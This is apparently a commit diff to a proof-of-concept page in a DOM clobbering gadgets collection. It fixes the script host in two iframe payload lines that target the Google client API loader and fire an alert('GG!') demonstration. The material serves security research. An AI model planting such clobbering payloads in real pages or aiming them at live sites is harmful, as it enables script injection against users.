[Gadget] Update the payload for the google client api gadget

--- a/domc-gadgets-assets/google-client-api/poc.html
+++ b/domc-gadgets-assets/google-client-api/poc.html
@@ -36,7 +36,7 @@
 <body onload="initialize()">
   <h1>Google Sheets API Client Example</h1>
   // PAYLOAD
-  <iframe name="scripts" src="https://api.google.com/js/api.js">alert("GG!")</iframe>
-  <iframe name="scripts" src="https://api.google.com/js/api.js">alert("GG!")</iframe>
+  <iframe name="scripts" src="https://apis.google.com/js/api.js">alert("GG!")</iframe>
+  <iframe name="scripts" src="https://apis.google.com/js/api.js">alert("GG!")</iframe>
 </body>
 </html>
